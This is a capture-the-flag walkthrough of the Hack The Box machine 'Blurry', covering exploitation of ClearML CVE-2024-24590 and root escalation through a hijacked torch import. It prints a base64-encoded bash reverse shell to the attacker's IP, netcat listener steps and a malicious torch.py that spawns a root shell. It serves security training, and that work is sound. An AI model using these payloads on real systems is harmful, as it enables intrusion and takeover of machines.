
Blurry
Hack The Box Machine Writeup

I think i need glasses for this one!
Summary
Blurry was a Linux box that was on the easier and shorter side of medium boxes. While it focuses around machine learning, no ML exploitation is required to complete the box. The user step involves a pickle deserialization vulnerability in the Clear ML web application known as CVE-2024-24590. The root step revolves around reviewing code and involves python import hijacking.
To conquer the user step first the attacker enumerates a couple of virtual host subdomains. It is interesting because in my exploitation of the box none of them were used except for app.blurry.htb which hosts a Clear ML web application. Searching for exploits the attacker can quickly come across a POC for CVE-2024-24590 and after some initial configurations this can be used to directly get a shell as Jippity and grab user.txt
The rootstep is similarly very straightforward but involves alot of code review. Enumerating sudo privileges revealed that Jippity can run a bash script called Evaluate_model as root. Checking out this script the attacker enumerates that it parses files for correctness and then passes them to a Evaluate_model.py script. This script does some machine learning stuff but what is important is that it imports torch. The attacker can then enumerate that they have write permissions to the location where the python script is run. This is important because an attacker can drop a malicious payload into a torch.py file in the models directory and this will be imported by the Evaulaute_model.py script that is run as root from the Evaulate_model bash script which we can run with sudo. When torch is used in Evaulaute_model.py, our payload will then be executed instead granting us a shell as root and completing the box.

Mr.Krabs when trying to do this box
User
Recon
Portscan with Nmap
I started off enumeration as I normally do with a port scan using nmap. -sC for default NSE scripts, -sV for version enumeration and sudo to run a -sS stealth scan.
┌─[us-dedivip-1]─[10.10.14.176]─[htb-mp-904224@htb-jzato00bew]─[~/Desktop]
└──╼ [★]$ sudo nmap -sC -sV 10.129.170.13
Starting Nmap 7.93 ( https://nmap.org ) at 2024-06-12 13:49 BST
Nmap scan report for 10.129.170.13
Host is up (0.030s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u3 (protocol 2.0)
| ssh-hostkey:
| 3072 3e21d5dc2e61eb8fa63b242ab71c05d3 (RSA)
| 256 3911423f0c250008d72f1b51e0439d85 (ECDSA)
|_ 256 b06fa00a9edfb17a497886b23540ec95 (ED25519)
80/tcp open http nginx 1.18.0
|_http-title: Did not follow redirect to http://app.blurry.htb/
|_http-server-header: nginx/1.18.0
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 7.80 seconds
This scan shows a subdomain/virtual host app.blurry.htb which I will add to my /etc/host file along with blurry.htb.
Virtual Host Fuzz with Wfuzz
I like to always try to fuzz for other virtual hosts when I have a domain. I run the scan once to find the default response length and then filter that out based on chars length with --hh so only different responses are returned.
┌─[us-dedivip-1]─[10.10.14.176]─[htb-mp-904224@htb-jzato00bew]─[~/Desktop]
└──╼ [★]$ wfuzz -u http://blurry.htb -H "Host:FUZZ.blurry.htb" -w /opt/useful/SecLists/Discovery/DNS/subdomains-top1million-20000.txt --hh 169
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://blurry.htb/
Total requests: 19983
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000051: 400 0 L 4 W 280 Ch "api"
000000070: 200 448 L 12829 W 218733 Ch "chat"
000000096: 200 0 L 1 W 2 Ch "files"
000000111: 200 28 L 363 W 13327 Ch "app"
Total time: 0
Processed Requests: 19983
Filtered Requests: 19979
Requests/sec.: 0
This scan discovers api, chat, files and app which we had already discovered. I proceeded to add all these to /etc/hosts noting that api is a 400 response and files only had a char length returned of 2.
10.10.11.19 api.blurry.htb chat.blurry.htb files.blurry.htb app.blurry.htb blurry.htb
app.blurry.htb
I started off enumerating the webserver on port 80 with the app.blurry.htb virtual host we were redirected to by default.
Ironic given the name of the machine
It appears to be a Clear|ML instance. ClearML is an open-source MLOps platform designed to streamline the entire machine learning workflow. On entering a name and logging in we are presented with a dashboard with quite a few options and things to enumerate.
You never know where a vulnerability will hide in a web application dashboard
I will come back to this later, my guess is that I can exploit the platform by adding in malicious commands to a project to be built, but it's always good to fully enumerate before attempting exploitation.

This explains why I am bad at AI, too much math!
Chat.blurry.htb
This virtual host presents us with a login for Rocket Chat.
Always good to try and see if you can register a user/enumerate usernames from login forms
I am able to make an account and login to the service. There is just one channel general with some general chatter that is not super useful, we do get usernames though. There is mention of a vision algorithm which is likely a hint.
General chat open to the internet? doesnt seem safe to me
Files.blurry.htb
The files virtual host simply returns an OK.
Likely an API or file directory location
This is a perfect time for a directory bruteforce scan which I did using feroxbuster. It did not return any hits however.
Api.blurry.htb
The api Vhost does appear to be an API with the default route returning an invalid request path message.
That's a lot of error info
I ran a Feroxbuster directory scan against this site as well but it also did not seem to return anything of value.
Clear ML CVE-2024-24590
The Clear ML instance seems like the most likely path forward at this point. I began searching for public exploits. I quickly came across CVE-2024-24590 pickle deserialization exploit. There was a good POC by xffsec here. I use git clone to download the exploit then install the requirements with pip.
┌──(kali㉿kali)-[~/Desktop]
└─$ git clone https://github.com/xffsec/CVE-2024-24590-ClearML-RCE-Exploit.git
Cloning into 'CVE-2024-24590-ClearML-RCE-Exploit'...
remote: Enumerating objects: 7, done.
remote: Counting objects: 100% (7/7), done.
remote: Compressing objects: 100% (5/5), done.
remote: Total 7 (delta 0), reused 7 (delta 0), pack-reused 0
Receiving objects: 100% (7/7), 11.81 KiB | 2.95 MiB/s, done.
┌──(kali㉿kali)-[~/Desktop]
└─$ cd CVE-2024-24590-ClearML-RCE-Exploit
┌──(kali㉿kali)-[~/Desktop/CVE-2024-24590-ClearML-RCE-Exploit]
└─$ pip3 install -r requirements.txt
<...>
Successfully installed clearml-1.16.2 furl-2.1.3 orderedmultidict-1.0.1 pathlib2-2.3.7.post1 referencing-0.35.1 rpy-0.18.1
I was getting an error when attempting to run the exploit. This was due to a pathing issue and was resolved by adding /.local/bin to my PATH.
ap┌──(kali㉿kali)-[~/Desktop/CVE-2024-24590-ClearML-RCE-Exploit]
└─$ python3 exploit.py
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠄⣠⣴⣶⣾⣿⣿⣿⣷⣶⣤⣀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⢀⣴⣿⣿⣿⡿⠿⠟⠛⠻⠿⣿⣿⣿⡷⠆⠄⠄⠄⠄⠄
⠄⠄⠄⠄⢠⣿⣿⣿⠟⠁⠄⠄⠄⠄⠄⠄⠄⠉⠛⠁⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢠⣿⣿⣿⠃⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢸⣿⣿⡇⠄⠄⠄⠄⣠⣾⠿⢿⡶⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⢸⣿⣿⣿⣿⡇⠄⠄⠄⠄⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⣿⣿⣿⣿⣷⡀⠄⠄⠄⠙⠿⣶⡾⠟⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠘⣿⣿⣿⣿⣷⣄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠘⢿⣿⣿⣿⣿⣷⣦⣤⣀⣀⣠⣤⣴⣿⣿⣷⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠁⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠈⠛⠻⠿⣿⣿⡏⠉⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
CVE-2024-24590 - ClearML RCE
============================
[1] Initialize ClearML
[2] Run exploit
[0] Exit
[>] Choose an option: 1
[+] Initializing ClearML
[i] Press enter after pasting the configuration
sh: 1: clearml-init: not found
[!] Terminating...
[?] Do you want to go back to the main menu or exit? (menu/exit):
┌──(kali㉿kali)-[~/Desktop/CVE-2024-24590-ClearML-RCE-Exploit]
└─$ export PATH=$PATH:~/.local/bin
Then we can register new creds by going to /settings/workspace-configuration as outlined in the exploit. Copy and paste the api information from the webpage into the exploit.
┌──(kali㉿kali)-[~/Desktop/CVE-2024-24590-ClearML-RCE-Exploit]
└─$ python3 exploit.py
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠄⣠⣴⣶⣾⣿⣿⣿⣷⣶⣤⣀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⢀⣴⣿⣿⣿⡿⠿⠟⠛⠻⠿⣿⣿⣿⡷⠆⠄⠄⠄⠄⠄
⠄⠄⠄⠄⢠⣿⣿⣿⠟⠁⠄⠄⠄⠄⠄⠄⠄⠉⠛⠁⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢠⣿⣿⣿⠃⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⢸⣿⣿⡇⠄⠄⠄⠄⣠⣾⠿⢿⡶⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⢸⣿⣿⣿⣿⡇⠄⠄⠄⠄⣿⡇⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⣿⣿⣿⣿⣷⡀⠄⠄⠄⠙⠿⣶⡾⠟⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠘⣿⣿⣿⣿⣷⣄⠄⠄⠄⠄⠄⠄⠄⠄⠄⣀⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠘⢿⣿⣿⣿⣿⣷⣦⣤⣀⣀⣠⣤⣴⣿⣿⣷⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠙⢿⣿⣿⣿⣿⣿⣿⣿⣿⣿⠿⠛⠁⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠈⠛⠻⠿⣿⣿⡏⠉⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄⠄
CVE-2024-24590 - ClearML RCE
============================
[1] Initialize ClearML
[2] Run exploit
[0] Exit
[>] Choose an option: 1
[+] Initializing ClearML
[i] Press enter after pasting the configuration
ClearML SDK setup process
Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration
In settings page, press "Create new credentials", then press "Copy to clipboard".
Paste copied configuration here:
Thank you for the access keys!
ClearML SDK setup process
Please create new clearml credentials through the settings page in your `clearml-server` web app (e.g. http://localhost:8080//settings/workspace-configuration)
Or create a free account at https://app.clear.ml/settings/workspace-configuration
In settings page, press "Create new credentials", then press "Copy to clipboard".
Paste copied configuration here:
Detected credentials key="HU3FF893M1YK5R5ZE6DP" secret="STzx***"
ClearML Hosts configuration:
Web App: http://app.blurry.htb
API: http://api.blurry.htb
File Store: http://files.blurry.htb
Verifying credentials ...
Credentials verified!
New configuration stored in /home/kali/clearml.conf
ClearML setup completed successfully.
[?] Do you want to go back to the main menu or exit? (menu/exit): menu
We can then go back to the main menu of the exploit and enter 2 to run the exploit. make sure to start a listener then pass in our ip and port. For the target project name we need to go back to the web application and find the project named Black Swan (Also an ironic name). Remember that it is case sensitive and pass this into the exploit and after a little while we should catch a shell.
Black Swan certainly is a suspicious name
[>] Choose an option: 2
[+] Your IP: 10.10.14.48
[+] Your Port: 42069
[+] Target Project name Case Sensitive!: Black Swan
[+] Payload to be used: echo YmFzaCAtYyAiYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC40OC80MjA2OSAwPiYxIg== | base64 -d | sh
[?] Do you want to start a listener on 42069? (y/n): n
[!] Remember to start a listener on 42069
ClearML Task: created new task id=35f78c5b62f940b8b949cf633132f878
ClearML results page: http://app.blurry.htb/projects/116c40b9b53743689239b6b460efd7be/experiments/35f78c5b62f940b8b949cf633132f878/output/log
[i] Please wait...
ClearML Monitor: GPU monitoring failed getting GPU reading, switching off GPU monitoring
┌──(kali㉿kali)-[~/Desktop]
└─$ nc -lvnp 42069
listening on [any] 42069 ...
connect to [10.10.14.48] from (UNKNOWN) [10.10.11.19] 35204
bash: cannot set terminal process group (2264): Inappropriate ioctl for device
bash: no job control in this shell
jippity@blurry:~$

In honor of the pickle deserialization
shell as jippity
Whenever i get a shell i like to upgrade the tty functionality so that i can use tab auto complete and the arrow keys. My go to way to do this is with script. I then grabbed user.txt.
jippity@blurry:~$ script /dev/null -c bash
script /dev/null -c bash
Script started, output log file is '/dev/null'.
jippity@blurry:~$ ^Z
zsh: suspended nc -lvnp 42069
┌──(kali㉿kali)-[~/Desktop]
└─$ stty raw -echo;fg
[1] + continued nc -lvnp 42069
reset
reset: unknown terminal type unknown
Terminal type? screen
jippity@blurry:~$ cat user.txt
eff90bd78da48a4080fde673733f0229

The IQ curve meme is in the top 5 best all time
Root
Enumeration
Sudo privileges
Starting off with checking sudo privleges with sudo -l we can see htat the jippity user can run /usr/bin/evaluate_model as root. What stands out is that there is a \* wildcard in the filenames.
jippity@blurry:~$ sudo -l
Matching Defaults entries for jippity on blurry:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User jippity may run the following commands on blurry:
(root) NOPASSWD: /usr/bin/evaluate_model /models/*.pth
This is almost certianly the way forward so I next spent some time looking over the evalute_model binary, which happens to just be a bash script.
Evaluate_model
jippity@blurry:~$ cat /usr/bin/evaluate_model
#!/bin/bash
# Evaluate a given model against our proprietary dataset.
# Security checks against model file included.
if [ "$#" -ne 1 ]; then
/usr/bin/echo "Usage: $0 <path_to_model.pth>"
exit 1
fi
MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"
/usr/bin/mkdir -p "$TEMP_DIR"
file_type=$(/usr/bin/file --brief "$MODEL_FILE")
# Extract based on file type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
# POSIX tar archive (older PyTorch format)
/usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
# Zip archive (newer PyTorch format)
/usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
/usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
exit 2
fi
/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")
if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
/usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
/bin/rm "$MODEL_FILE"
break
fi
done
/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"
if [ -f "$MODEL_FILE" ]; then
/usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
/usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi
This Bash script is designed to evaluate a given model file against a proprietary dataset, with included security checks to ensure the model file is safe to use. Here’s a step-by-step breakdown of what the script does:
Argument Check
if [ "$#" -ne 1 ]; then
/usr/bin/echo "Usage: $0 <path_to_model.pth>"
exit 1
fi
This checks if exactly one argument (the path to the model file) is provided. If not, it prints a usage message and exits with status code 1.
Variable Initialization
MODEL_FILE="$1"
TEMP_DIR="/models/temp"
PYTHON_SCRIPT="/models/evaluate_model.py"
Create Temporary Directory
/usr/bin/mkdir -p "$TEMP_DIR"
This creates a temporary directory to store extracted files from the model file.
Determine File Type
file_type=$(/usr/bin/file --brief "$MODEL_FILE")
This determines the type of the model file using the `file` command.
Extract Files Based on File Type
if [[ "$file_type" == *"POSIX tar archive"* ]]; then
/usr/bin/tar -xf "$MODEL_FILE" -C "$TEMP_DIR"
elif [[ "$file_type" == *"Zip archive data"* ]]; then
/usr/bin/unzip -q "$MODEL_FILE" -d "$TEMP_DIR"
else
/usr/bin/echo "[!] Unknown or unsupported file format for $MODEL_FILE"
exit 2
fi
Depending on whether the file is a POSIX tar archive or a Zip archive, the script extracts the contents to the temporary directory. If the file type is unsupported, it prints an error message and exits with status code 2.
Security Check for Pickle Files
/usr/bin/find "$TEMP_DIR" -type f \( -name "*.pkl" -o -name "pickle" \) -print0 | while IFS= read -r -d $'\0' extracted_pkl; do
fickling_output=$(/usr/local/bin/fickling -s --json-output /dev/fd/1 "$extracted_pkl")
if /usr/bin/echo "$fickling_output" | /usr/bin/jq -e 'select(.severity == "OVERTLY_MALICIOUS")' >/dev/null; then
/usr/bin/echo "[!] Model $MODEL_FILE contains OVERTLY_MALICIOUS components and will be deleted."
/bin/rm "$MODEL_FILE"
break
fi
done
This section finds all pickle files (`*.pkl` or `pickle`) in the temporary directory and checks each one for malicious content using `fickling` and `jq`. If any file is found to be overtly malicious, the original model file is deleted, and the loop breaks.
Cleanup
/usr/bin/find "$TEMP_DIR" -type f -exec /bin/rm {} +
/bin/rm -rf "$TEMP_DIR"
This removes all files and the temporary directory created during extraction.
Model Evaluation
if [ -f "$MODEL_FILE" ]; then
/usr/bin/echo "[+] Model $MODEL_FILE is considered safe. Processing..."
/usr/bin/python3 "$PYTHON_SCRIPT" "$MODEL_FILE"
fi
If the model file is still present (i.e., it wasn’t deleted due to being malicious), it is considered safe. The script then proceeds to evaluate the model by calling a Python script (`evaluate_model.py`) with the model file as an argument.
In summary, the script ensures the provided model file is safe by checking its format, extracting its contents, and scanning for any malicious pickle files before finally evaluating the model using a python script passed in env variables. Looking at our env variables we cannot see one for the python script.
jippity@blurry:/models$ env
SHELL=/bin/sh
TRAINS_PROC_MASTER_ID=2265:4f82d1b209cc4a2a9768ebe9c255b476
PWD=/models
LOGNAME=jippity
HOME=/home/jippity
LANG=en_US.UTF-8
LS_COLORS=
SHLVL=3
CLEARML_PROC_MASTER_ID=2265:4f82d1b209cc4a2a9768ebe9c255b476
PATH=/usr/bin:/bin:/home/jippity/.local/bin:/home/jippity/.local/bin
_=/usr/bin/env
OLDPWD=/
.png)
Python is both a blessing and a curse upon humnaity
Evaluate_model.py
Looking in the /modles dircectroy we can find evaluate_model.py. This is likely the python script being ran by the /usr/bin/evaluate_model bash script.
jippity@blurry:/models$ cat evaluate_model.py
import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys
class CustomCNN(nn.Module):
def __init__(self):
super(CustomCNN, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
self.fc2 = nn.Linear(in_features=128, out_features=10)
self.relu = nn.ReLU()
def forward(self, x):
x = self.pool(self.relu(self.conv1(x)))
x = self.pool(self.relu(self.conv2(x)))
x = x.view(-1, 32 * 8 * 8)
x = self.relu(self.fc1(x))
x = self.fc2(x)
return x
def load_model(model_path):
model = CustomCNN()
state_dict = torch.load(model_path)
model.load_state_dict(state_dict)
model.eval()
return model
def prepare_dataloader(batch_size=32):
transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
])
dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
return dataloader
def evaluate_model(model, dataloader):
correct = 0
total = 0
with torch.no_grad():
for images, labels in dataloader:
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
accuracy = 100 * correct / total
print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')
def main(model_path):
model = load_model(model_path)
print("[+] Loaded Model.")
dataloader = prepare_dataloader()
print("[+] Dataloader ready. Evaluating model...")
evaluate_model(model, dataloader)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python script.py <path_to_model.pth>")
else:
model_path = sys.argv[1] # Path to the .pth file
main(model_path)
Imports
import torch
import torch.nn as nn
from torchvision import transforms
from torchvision.datasets import CIFAR10
from torch.utils.data import DataLoader, Subset
import numpy as np
import sys
These imports bring in the necessary libraries for creating neural networks (`torch` and `torch.nn`), handling datasets and transformations (`torchvision`), and managing data loading (`DataLoader`, `Subset`). `numpy` is used for numerical operations, and `sys` is used for handling command-line arguments.
CustomCNN Class
class CustomCNN(nn.Module):
def __init__(self):
super(CustomCNN, self).__init__()
self.conv1 = nn.Conv2d(in_channels=3, out_channels=16, kernel_size=3, padding=1)
self.conv2 = nn.Conv2d(in_channels=16, out_channels=32, kernel_size=3, padding=1)
self.pool = nn.MaxPool2d(kernel_size=2, stride=2, padding=0)
self.fc1 = nn.Linear(in_features=32 * 8 * 8, out_features=128)
self.fc2 = nn.Linear(in_features=128, out_features=10)
self.relu = nn.ReLU()
def forward(self, x):
x = self.pool(self.relu(self.conv1(x)))
x = self.pool(self.relu(self.conv2(x)))
x = x.view(-1, 32 * 8 * 8)
x = self.relu(self.fc1(x))
x = self.fc2(x)
return x
This defines a custom convolutional neural network (CNN) named `CustomCNN`. The network includes:
Load Model Function
def load_model(model_path):
model = CustomCNN()
state_dict = torch.load(model_path)
model.load_state_dict(state_dict)
model.eval()
return model
This function loads the model's state from a specified path (`model_path`), initializes an instance of `CustomCNN`, and loads the state dictionary into the model. The model is set to evaluation mode (`model.eval()`), which is important for operations like dropout and batch normalization to behave correctly during evaluation.
Prepare Dataloader Function
def prepare_dataloader(batch_size=32):
transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.RandomCrop(32, padding=4),
transforms.ToTensor(),
transforms.Normalize(mean=[0.4914, 0.4822, 0.4465], std=[0.2023, 0.1994, 0.2010]),
])
dataset = CIFAR10(root='/root/datasets/', train=False, download=False, transform=transform)
subset = Subset(dataset, indices=np.random.choice(len(dataset), 64, replace=False))
dataloader = DataLoader(subset, batch_size=batch_size, shuffle=False)
return dataloader
This function prepares a data loader for the CIFAR-10 test dataset:
Evaluate Model Function
def evaluate_model(model, dataloader):
correct = 0
total = 0
with torch.no_grad():
for images, labels in dataloader:
outputs = model(images)
_, predicted = torch.max(outputs.data, 1)
total += labels.size(0)
correct += (predicted == labels).sum().item()
accuracy = 100 * correct / total
print(f'[+] Accuracy of the model on the test dataset: {accuracy:.2f}%')
This function evaluates the model's performance on the provided data loader:
Main Function
def main(model_path):
model = load_model(model_path)
print("[+] Loaded Model.")
dataloader = prepare_dataloader()
print("[+] Dataloader ready. Evaluating model...")
evaluate_model(model, dataloader)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("Usage: python script.py <path_to_model.pth>")
else:
model_path = sys.argv[1] # Path to the .pth file
main(model_path)
The `main` function is the entry point of the script:
In summary this code implements a complete process from loading a pre-trained neural net model to evaluating the model's accuracy, which is suitable for image classification tasks, especially the CIFAR-10 dataset. By passing the model file path through the command line, the script can load the model and evaluate it on the specified dataset.
None of this is really exploitable however, and in this case the most important aspect is the import statements.

Matlab lol
Hijacking Torch Python Import
We can see that our user jippty has write privileges over the modules directory. This is big because the order of python imports is:
1. The directory from which the input script was run (or the current directory if the interpreter is being run interactively). 2. Directories listed in the `PYTHONPATH` environment variable. 3. Standard library directories.
This means that we can create a torch.py file that contains a shell payload and since it is in the same directory as the Evaulate_modle.py script it will be imported. When torch is then called it will execute our payload and grant us a root shell. We can use the demo_model.pth for the model to be ran as it has no effect on the exploit chain.
jippity@blurry:/$ ls -la
total 72
drwxr-xr-x 19 root root 4096 Jun 3 09:28 .
drwxr-xr-x 19 root root 4096 Jun 3 09:28 ..
lrwxrwxrwx 1 root root 7 Nov 7 2023 bin -> usr/bin
drwxr-xr-x 3 root root 4096 Jun 3 09:28 boot
<...>
drwxrwxr-x 2 root jippity 4096 Jun 17 14:11 models
<...>
jippity@blurry:/models$ echo 'import os; os.system("bash")' > /models/torch.py
jippity@blurry:/models$ ls
demo_model.pth evaluate_model.py torch.py
jippity@blurry:/models$ cat torch.py
import os; os.system("bash")
jippity@blurry:/models$ sudo /usr/bin/evaluate_model /models/demo_model.pth
[+] Model /models/demo_model.pth is considered safe. Processing...
root@blurry:/models# id
uid=0(root) gid=0(root) groups=0(root)
We can now grab root.txt and complete the box.
root@blurry:~# cd /root
root@blurry:~# cat root.txt
a3845548ef434fa06d1d4da247830059

Congrats on one more box completed before the AI overlords take control
Additional Resources
Ippsec video walkthrough
0xdf writeup
0xdf.gitlab.io